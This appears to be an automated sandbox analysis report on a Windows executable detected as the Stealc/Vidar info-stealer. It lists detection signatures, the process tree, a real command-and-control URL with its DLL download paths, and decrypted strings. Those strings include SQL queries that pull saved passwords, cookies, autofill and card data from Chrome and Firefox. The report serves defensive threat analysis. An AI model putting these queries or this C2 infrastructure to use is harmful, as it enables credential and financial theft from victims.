
Windows Analysis Report
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Overview

General Information

Sample name: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Analysis ID: 1454088
MD5: 9c2b900d014ba5b9dfd0ca6cef201753
SHA1: e5705841f68d9443ba5efb553aa9f87556e403e5
SHA256: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
Tags: exe, Stealc

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe" MD5: 9C2B900D014BA5B9DFD0CA6CEF201753)
    • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
Source | Rule | Description | Author | Strings
2.2.aspnet_regiis.exe.2750000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.aspnet_regiis.exe.2750000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
2.2.aspnet_regiis.exe.2750000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
No Sigma rule has matched
Timestamp: 06/08/24-20:21:59.805841 | SID: 2051828 | Source Port: 80 | Destination Port: 49731 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 06/08/24-20:21:59.555146 | SID: 2044244 | Source Port: 49731 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 06/08/24-20:22:00.160152 | SID: 2051831 | Source Port: 80 | Destination Port: 49731 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 06/08/24-20:21:58.692257 | SID: 2044243 | Source Port: 49731 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 06/08/24-20:21:59.902142 | SID: 2044246 | Source Port: 49731 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected



AV Detection

Source: http://23.88.106.134/6a9f8e2503d99c04.phpGS | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpwser | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpC | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php?S | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9 | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpm | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpiSS | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phppenSSH | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpz | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpition: | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php) | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.phpcS | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x | Avira URL Cloud: Label: malware
Source: http://23.88.106.134 | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4 | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: http://23.88.106.134/6a9f8e2503d99c04.php6 | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
Source: http://23.88.106.134/6a9f8e2503d99c04.php | Virustotal: Detection: 12%
Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll | Virustotal: Detection: 11%
Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll | Virustotal: Detection: 12%
Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll | Virustotal: Detection: 11%
Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll | Virustotal: Detection: 11%
Source: http://23.88.106.134/6a9f8e2503d99c04.phpition: | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Roaming\d3d9.dll | ReversingLabs: Detection: 79%
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | ReversingLabs: Detection: 37%
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Virustotal: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\d3d9.dll | Joe Sandbox ML: detected
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Joe Sandbox ML: detected
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack | String decryptor (all strings below were recovered from this one source, listed in the order reported):
INSERT_KEY_HERE, GetProcAddress, LoadLibraryA, lstrcatA, OpenEventA, CreateEventA, CloseHandle, Sleep,
GetUserDefaultLangID, VirtualAllocExNuma, VirtualFree, GetSystemInfo, VirtualAlloc, HeapAlloc, GetComputerNameA, lstrcpyA,
GetProcessHeap, GetCurrentProcess, lstrlenA, ExitProcess, GlobalMemoryStatusEx, GetSystemTime, SystemTimeToFileTime, advapi32.dll,
gdi32.dll, user32.dll, crypt32.dll, ntdll.dll, GetUserNameA, CreateDCA, GetDeviceCaps, ReleaseDC,
CryptStringToBinaryA, sscanf, VMwareVMware, HAL9TH, JohnDoe, DISPLAY, %hu/%hu/%hu, http://23.88.106.134,
/6a9f8e2503d99c04.php, /566d6e1ec8db6394/, cuapfss, GetEnvironmentVariableA, GetFileAttributesA, GlobalLock, HeapFree, GetFileSize,
GlobalSize, CreateToolhelp32Snapshot, IsWow64Process, Process32Next, GetLocalTime, FreeLibrary, GetTimeZoneInformation, GetSystemPowerStatus,
GetVolumeInformationA, GetWindowsDirectoryA, Process32First, GetLocaleInfoA, GetUserDefaultLocaleName, GetModuleFileNameA, DeleteFileA, FindNextFileA,
LocalFree, FindClose, SetEnvironmentVariableA, LocalAlloc, GetFileSizeEx, ReadFile, SetFilePointer, WriteFile,
CreateFileA, FindFirstFileA, CopyFileA, VirtualProtect, GetLogicalProcessorInformationEx, GetLastError, lstrcpynA, MultiByteToWideChar,
GlobalFree, WideCharToMultiByte, GlobalAlloc, OpenProcess, TerminateProcess, GetCurrentProcessId, gdiplus.dll, ole32.dll,
bcrypt.dll, wininet.dll, shlwapi.dll, shell32.dll, psapi.dll, rstrtmgr.dll, CreateCompatibleBitmap, SelectObject,
BitBlt, DeleteObject, CreateCompatibleDC, GdipGetImageEncodersSize, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdiplusStartup, GdiplusShutdown,
GdipSaveImageToStream, GdipDisposeImage, GdipFree, GetHGlobalFromStream, CreateStreamOnHGlobal, CoUninitialize, CoInitialize, CoCreateInstance,
BCryptGenerateSymmetricKey, BCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptSetProperty, BCryptDestroyKey, BCryptOpenAlgorithmProvider, GetWindowRect, GetDesktopWindow,
GetDC, CloseWindow, wsprintfA, EnumDisplayDevicesA, GetKeyboardLayoutList, CharToOemW, wsprintfW, RegQueryValueExA,
RegEnumKeyExA, RegOpenKeyExA, RegCloseKey, RegEnumValueA, CryptBinaryToStringA, CryptUnprotectData, SHGetFolderPathA, ShellExecuteExA,
InternetOpenUrlA, InternetConnectA, InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, InternetReadFile, InternetCrackUrlA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrCmpCA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrStrA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrCmpCW
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PathMatchSpecA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetModuleFileNameExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmStartSession
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmRegisterResources
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmGetList
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmEndSession
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_open
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_prepare_v2
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_step
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_text
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_finalize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_close
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_bytes
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_blob
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encrypted_key
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PATH
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: NSS_Init
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: NSS_Shutdown
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_GetInternalKeySlot
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_FreeSlot
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_Authenticate
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11SDR_Decrypt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\ProgramData\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: browser:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: profile:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: url:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: login:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: password:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: OperaGX
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Network
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: .txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: TRUE
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FALSE
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: autofill
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT name, value FROM autofill
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: history
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: name:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: month:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: year:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: card:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Login Data
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Web Data
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: History
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: logins.json
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: formSubmitURL
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: usernameField
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encryptedUsername
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encryptedPassword
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: guid
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: cookies.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: formhistory.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: places.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: plugins
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Local Extension Settings
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Sync Extension Settings
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: IndexedDB
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera Stable
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera GX Stable
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CURRENT
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: chrome-extension_
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: _0.indexeddb.leveldb
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Local State
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: chrome
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: opera
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: firefox
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: wallets
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %08lX%04lX%lu
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ProductName
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ProcessorNameString
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DisplayName
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DisplayVersion
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Network Info:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - IP: IP?
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Country: ISO?
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: System Summary:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - HWID:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - OS:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Architecture:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - UserName:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Computer Name:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Local Time:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - UTC:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Language:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Keyboards:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Laptop:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Running Path:
